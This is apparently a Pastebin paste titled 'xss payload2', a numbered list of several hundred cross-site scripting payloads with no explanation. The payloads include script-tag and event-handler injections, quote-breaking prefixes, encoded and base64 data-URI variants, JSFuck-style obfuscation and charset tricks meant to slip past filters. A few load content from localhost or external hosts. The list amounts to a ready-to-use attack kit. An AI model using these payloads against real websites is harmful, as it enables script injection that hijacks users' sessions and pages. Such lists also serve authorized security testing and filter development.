fahim420

xss payload2

Oct 9th, 2015
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 317.74 KB | None | 0 0
  1. ''">
  2. ”><script>alert(“X”)</script>
  3. ’><script>alert(1)</script>
  4. "><script>alert(1)</script>
  5. '><script>alert(1)</script>
  6. ' '><script>alert(1)</script>
  7. "><script>alert(1)</script>
  8. '><script>alert(1)</script>
  9. <script>alert(1)</script>
  10. "><script>alert(1)</script>
  11. '><script>alert(1)</script>
  12. " onerror=alert(1) "
  13. " onerror=alert(1) x="
  14. -alert(1)-
  15. -prompt(1)-
  16. <marquee/onstart=confirm(1)>
  17. "><marquee/onstart=confirm(1)>
  18. '><marquee/onstart=confirm(1)>
  19. <img src=x onerror=prompt(1);>
  20. "><img src=x onerror=prompt(1);>
  21. '><img src=x onerror=prompt(1);>
  22. <img src=x onerror=prompt(1)>
  23. "><img src=x onerror=prompt(1)>
  24. '><img src=x onerror=prompt(1)>
  25. '';!--"<X>=&{()}
  26. <SCRIPT>+alert("X");</SCRIPT>
  27. "><SCRIPT>+alert("X");</SCRIPT>
  28. '><SCRIPT>+alert("X");</SCRIPT>
  29. <SCRIPT>+alert("X")</SCRIPT>
  30. "><SCRIPT>+alert("X")</SCRIPT>
  31. '><SCRIPT>+alert("X")</SCRIPT>
  32. <script>alert(/X/)</script>
  33. "><script>alert(/X/)</script>
  34. '><script>alert(/X/)</script>
  35. <svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
  36. "><svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
  37. '><svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
  38. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  39. "><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  40. '><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  41. <math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
  42. "><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
  43. '><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
  44. <embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
  45. "><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
  46. '><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
  47. <script itworksinallbrowsers>/*<script* */alert(1)</script
  48. "><script itworksinallbrowsers>/*<script* */alert(1)</script
  49. '><script itworksinallbrowsers>/*<script* */alert(1)</script
  50. <img src ?itworksonchrome?\/onerror = alert(1)
  51. "><img src ?itworksonchrome?\/onerror = alert(1)
  52. '><img src ?itworksonchrome?\/onerror = alert(1)
  53. <script crossorigin>alert(1);</script>
  54. "><script crossorigin>alert(1);</script>
  55. '><script crossorigin>alert(1);</script>
  56. <script async>alert(1);</script async>
  57. "><script async>alert(1);</script async>
  58. '><script async>alert(1);</script async>
  59. <script charset>alert(1);</script charset>
  60. "><script charset>alert(1);</script charset>
  61. '><script charset>alert(1);</script charset>
  62. <script a b c >alert(1)</script d e f>
  63. "><script a b c >alert(1)</script d e f>
  64. '><script a b c >alert(1)</script d e f>
  65. <img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>
  66. "><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>
  67. '><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)>
  68. "><img src=x onerror=prompt(1)>
  69. '><img src=x onerror=prompt(1)>
  70. <img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)>
  71. "><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)>
  72. '><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)>
  73. <img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>
  74. "><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>
  75. '><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)>
  76. "><img src=x onerror=prompt(1)>
  77. '><img src=x onerror=prompt(1)>
  78. <img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>
  79. "><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>
  80. '><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)>
  81. <svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>
  82. "><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>
  83. '><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)>
  84. <svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>
  85. "><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>
  86. '><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)>
  87. <svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>
  88. "><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>
  89. '><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)>
  90. <svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>
  91. "><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>
  92. '><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)>
  93. --!><svg onload=prompt(1)
  94. eval(((_=!1)+{})[1]+(_+{})[2]+(_+{})[4]+((_=!!1)+{})[1]+(_+{})[0]+((_=>(_))+1)[3]+1+((_=>(_))+1)[5])
  95. eval((_=!0+(()=>0)+!1)[10]+_[11]+_[3]+_[1]+_[0]+_[4]+1+_[5])
  96. <marquee>alert( `X :)`)</marquee>
  97. "><marquee>alert( `X :)`)</marquee>
  98. '><marquee>alert( `X :)`)</marquee>
  99. <"script">"alert(0)"</"script">
  100. "><"script">"alert(0)"</"script">
  101. '><"script">"alert(0)"</"script">
  102. <s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
  103. "><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
  104. '><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
  105. <video><source o?UTF-8?Q?n?error="alert(1)">
  106. "><video><source o?UTF-8?Q?n?error="alert(1)">
  107. '><video><source o?UTF-8?Q?n?error="alert(1)">
  108. <body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  109. "><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  110. '><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  111. <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  112. "><meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  113. '><meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
  114. <x onload'=alert(1)
  115. "><x onload'=alert(1)
  116. '><x onload'=alert(1)
  117. <sc'+'ript>alert(1)</script>
  118. "><sc'+'ript>alert(1)</script>
  119. '><sc'+'ript>alert(1)</script>
  120. <FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
  121. "><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
  122. '><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
  123. </script>"//'//<svg%0Aonload=alert(1)//>
  124. "></script>"//'//<svg%0Aonload=alert(1)//>
  125. '></script>"//'//<svg%0Aonload=alert(1)//>
  126. '//</script><svg%20"%0aonload=alert(1)%20//>
  127. </script>'//<svg "%0Aonload=alert(1) //>
  128. "></script>'//<svg "%0Aonload=alert(1) //>
  129. '></script>'//<svg "%0Aonload=alert(1) //>
  130. '//</script><svg "%0Aonload=alert(1)// />
  131. </script>"//'//<svg%0Aonload=alert(1) //>
  132. "></script>"//'//<svg%0Aonload=alert(1) //>
  133. '></script>"//'//<svg%0Aonload=alert(1) //>
  134. </script>'//<svg "%0Aonload=alert(1)// />
  135. "></script>'//<svg "%0Aonload=alert(1)// />
  136. '></script>'//<svg "%0Aonload=alert(1)// />
  137. </script "//'//><svg%0Aonload=alert(1)//>
  138. "></script "//'//><svg%0Aonload=alert(1)//>
  139. '></script "//'//><svg%0Aonload=alert(1)//>
  140. ';//</script><svg ";%0Aonload=alert(1)// />#
  141. </script><img src '//"%0Aonerror=alert(1)//
  142. "></script><img src '//"%0Aonerror=alert(1)//
  143. '></script><img src '//"%0Aonerror=alert(1)//
  144. </script><svg onload='-/"/-[alert(1)]//'/>
  145. "></script><svg onload='-/"/-[alert(1)]//'/>
  146. '></script><svg onload='-/"/-[alert(1)]//'/>
  147. </script><img '//"%0Aonerror=alert(1)// src>
  148. "></script><img '//"%0Aonerror=alert(1)// src>
  149. '></script><img '//"%0Aonerror=alert(1)// src>
  150. </script><img '//"%0Aonerror=alert(1)// src=1>
  151. "></script><img '//"%0Aonerror=alert(1)// src=1>
  152. '></script><img '//"%0Aonerror=alert(1)// src=1>
  153. </script "/*'/*><svg */; onload=alert(1) //>
  154. "></script "/*'/*><svg */; onload=alert(1) //>
  155. '></script "/*'/*><svg */; onload=alert(1) //>
  156. </script><script>/*"/*'/**/;alert(1)//</script>#
  157. "></script><script>/*"/*'/**/;alert(1)//</script>#
  158. '></script><script>/*"/*'/**/;alert(1)//</script>#
  159. </script "/*'/*><img/src=x */; onerror=alert(1) //
  160. "></script "/*'/*><img/src=x */; onerror=alert(1) //
  161. '></script "/*'/*><img/src=x */; onerror=alert(1) //
  162. </script><script>/*var a="/*""'/**/;alert(1);//</script>
  163. "></script><script>/*var a="/*""'/**/;alert(1);//</script>
  164. '></script><script>/*var a="/*""'/**/;alert(1);//</script>
  165. <iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
  166. "><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
  167. '><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
  168. ' style='width:expression(prompt(1));
  169. "width:expression(prompt(1))
  170. width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029
  171. javascript:prompt(1)
  172. javascript:\u0070rompt&#x28;1&#x29;
  173. jAvAsCrIpT&colon;prompt&lpar;1&rpar;
  174. http://jsfiddle.net/xboz/c7vvkedv/
  175. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  176. "><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  177. '><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  178. <DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
  179. "><DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
  180. '><DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
  181. data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=
  182. data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+cHJvbXB0KDEpOzwvc2NyaXB0Pjwvc3ZnPg==
  183. data:text/html;base64,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=
  184. data:text/html;,&#60&#115&#99&#114&#105&#112&#116&#62&#112&#114&#111&#109&#112&#116&#40&#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62
  185. ``onerror=prompt(1)
  186. alert(/XSS/);
  187. 1;alert(/XSS/);
  188. 1';alert(/XSS/);x='1
  189. ';alert(/XSS/);'
  190. <svg><script>prompt&#40 1&#41</script>
  191. "><svg><script>prompt&#40 1&#41</script>
  192. '><svg><script>prompt&#40 1&#41</script>
  193. <html> <script> var a="</script><script>alert(1)//";</script> </html>
  194. "><html> <script> var a="</script><script>alert(1)//";</script> </html>
  195. '><html> <script> var a="</script><script>alert(1)//";</script> </html>
  196. &#34;><script>alert(1)</script>
  197. "><script>alert(1)</script>
  198. '><script>alert(1)</script>
  199. '';}}</script><script>alert(1)</script>
  200. "><script>alert(1)</script>
  201. '><script>alert(1)</script>
  202. <body onpageshow=alert(1)>
  203. "><body onpageshow=alert(1)>
  204. '><body onpageshow=alert(1)>
  205. <body onpageshow=alert(1);>
  206. "><body onpageshow=alert(1);>
  207. '><body onpageshow=alert(1);>
  208. <body/onpageshow=alert(1)>
  209. "><body/onpageshow=alert(1)>
  210. '><body/onpageshow=alert(1)>
  211. <body/onpageshow=alert(1);>
  212. "><body/onpageshow=alert(1);>
  213. '><body/onpageshow=alert(1);>
  214. "><b/onclick="javascript:window.window.window['alert'](1)">bold
  215. <body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>
  216. "><body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>
  217. '><body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>
  218. behaviour:url\0028javascript:alert\0028[0][0]\0029\0029
  219. <iframe src="javascript:x:alert(1)">
  220. "><iframe src="javascript:x:alert(1)">
  221. '><iframe src="javascript:x:alert(1)">
  222. <a href="javascript:x:alert(1)">x</a>
  223. "><a href="javascript:x:alert(1)">x</a>
  224. '><a href="javascript:x:alert(1)">x</a>
  225. <a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>
  226. "><a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>
  227. '><a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>
  228. <div contextmenu=x>right-click<menu id=x onshow=alert(1)>
  229. "><div contextmenu=x>right-click<menu id=x onshow=alert(1)>
  230. '><div contextmenu=x>right-click<menu id=x onshow=alert(1)>
  231. ";document.body.addEventListener("DOMActivate",alert(1))//
  232. /*@cc_on @if(1)alert(1)@end
  233. var a=0; ((a == 1) ? 2 : alert(1));//
  234. (0)['constructor']['constructor']("\141\154\145\162\164(1)")();
  235. <input oninput=alert(1)>
  236. "><input oninput=alert(1)>
  237. '><input oninput=alert(1)>
  238. <video onprogress=alert(1)><source src=//a.a>
  239. "><video onprogress=alert(1)><source src=//a.a>
  240. '><video onprogress=alert(1)><source src=//a.a>
  241. <video onprogress=alert(1)><source src=x>
  242. "><video onprogress=alert(1)><source src=x>
  243. '><video onprogress=alert(1)><source src=x>
  244. <video/onprogress=alert(1)><source/src=//a.a>
  245. "><video/onprogress=alert(1)><source/src=//a.a>
  246. '><video/onprogress=alert(1)><source/src=//a.a>
  247. <video/onprogress=alert(1)><source/src=x>
  248. "><video/onprogress=alert(1)><source/src=x>
  249. '><video/onprogress=alert(1)><source/src=x>
  250. <video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  251. "><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  252. '><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  253. <video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  254. "><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  255. '><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>
  256. <svg onload=\u0061lert(1)>
  257. "><svg onload=\u0061lert(1)>
  258. '><svg onload=\u0061lert(1)>
  259. <meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>
  260. "><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>
  261. '><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>
  262. <meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>
  263. "><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>
  264. '><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>
  265. <meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>
  266. "><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>
  267. '><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>
  268. <meta charset=Shift_JIS><script>x="く\";alert(1)//"</script>
  269. "><meta charset=Shift_JIS><script>x="く\";alert(1)//"</script>
  270. '><meta charset=Shift_JIS><script>x="く\";alert(1)//"</script>
  271. this["alert"]("X")
  272. this['alert'](1)
  273. <script>this["alert"]("X")</script>
  274. "><script>this["alert"]("X")</script>
  275. '><script>this["alert"]("X")</script>
  276. <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//
  277. "><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//
  278. '><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//
  279. <svg onload=alert(1)>
  280. "><svg onload=alert(1)>
  281. '><svg onload=alert(1)>
  282. <svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />
  283. "><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />
  284. '><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />
  285. "-alert(1)-"
  286. "/alert(1)/"
  287. "|alert(1)|"
  288. ==alert(1)==
  289. [alert(1)]+
  290. ^alert(1)^
  291. |alert(1)|
  292. &alert(1)&
  293. >>alert(1)>>
  294. <form name=self location="javascript:alert(1)"
  295. "><form name=self location="javascript:alert(1)"
  296. '><form name=self location="javascript:alert(1)">
  297. "><form name=self location="javascript:alert(1)"
  298. "><form name=self location="javascript:alert(1)"
  299. '><form name=self location="javascript:alert(1)">
  300. '><form name=self location="javascript:alert(1)"
  301. "><form name=self location="javascript:alert(1)"
  302. '><form name=self location="javascript:alert(1)">
  303. <form name=self location="javascript:alert(1)"
  304. "><form name=self location="javascript:alert(1)"
  305. '><form name=self location="javascript:alert(1)"
  306. '|\u0061lert()|'
  307. <style%0conload=alert(1)>
  308. "><style%0conload=alert(1)>
  309. '><style%0conload=alert(1)>
  310. <ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>
  311. "><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>
  312. '><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>
  313. <scrip<script>t>alert(1)</script>
  314. "><scrip<script>t>alert(1)</script>
  315. '><scrip<script>t>alert(1)</script>
  316. javasCript:eval%28'aler'+'t'+'%28%29'%29
  317. &quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
  318. Data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
  319. <img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
  320. "><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
  321. '><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>
  322. <IMG SRC="jav ascript:alert('X');">
  323. "><IMG SRC="jav ascript:alert('X');">
  324. '><IMG SRC="jav ascript:alert('X');">
  325. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
  326. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
  327. '><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("X")>
  328. \";alert('X');//
  329. &#x00027;; confirm(1); &#x00027;
  330. &#39;; confirm(1); &#39;
  331. %27; confirm(1); %27
  332. &apos;; confirm(1); &apos;
  333. \u0027 confirm(1); \u0027
  334. "; [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])(); "
  335. "; eval('\u0061'+'\x6c'+'e'+'r'+'t')(2); "
  336. "; alert&#40 3&#41 ; "
  337. "; javascript:&#x61;ler\u0074&lpar;4); "
  338. "; javascript:window.open('data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='); "
  339. "onmouseover="alert(1)
  340. &#34;onmouseover=&#34;alert(1)
  341. &#x00022;onmouseover=&#x00022;alert(1)
  342. %22onmouseover=%22alert(1)
  343. &quot;onmouseover=&quot;alert(1)
  344. \u0022onmouseover=\u0022alert(1)
  345. width:expression(prompt(1))
  346. width:ex/**/pression(prompt(1))
  347. width&#x3A;ex/**/pression&#x28;prompt&#x28;1&#x29;&#x29;
  348. width:expression\28 prompt \28 1 \29 \29
  349. width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029"
  350. background-image: url(javascript:prompt(1))
  351. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  352. "><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  353. '><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  354. "><img src=x onerror=window.open('http://www.opensecurity.in/');>
  355. <object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
  356. "><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
  357. '><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
  358. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
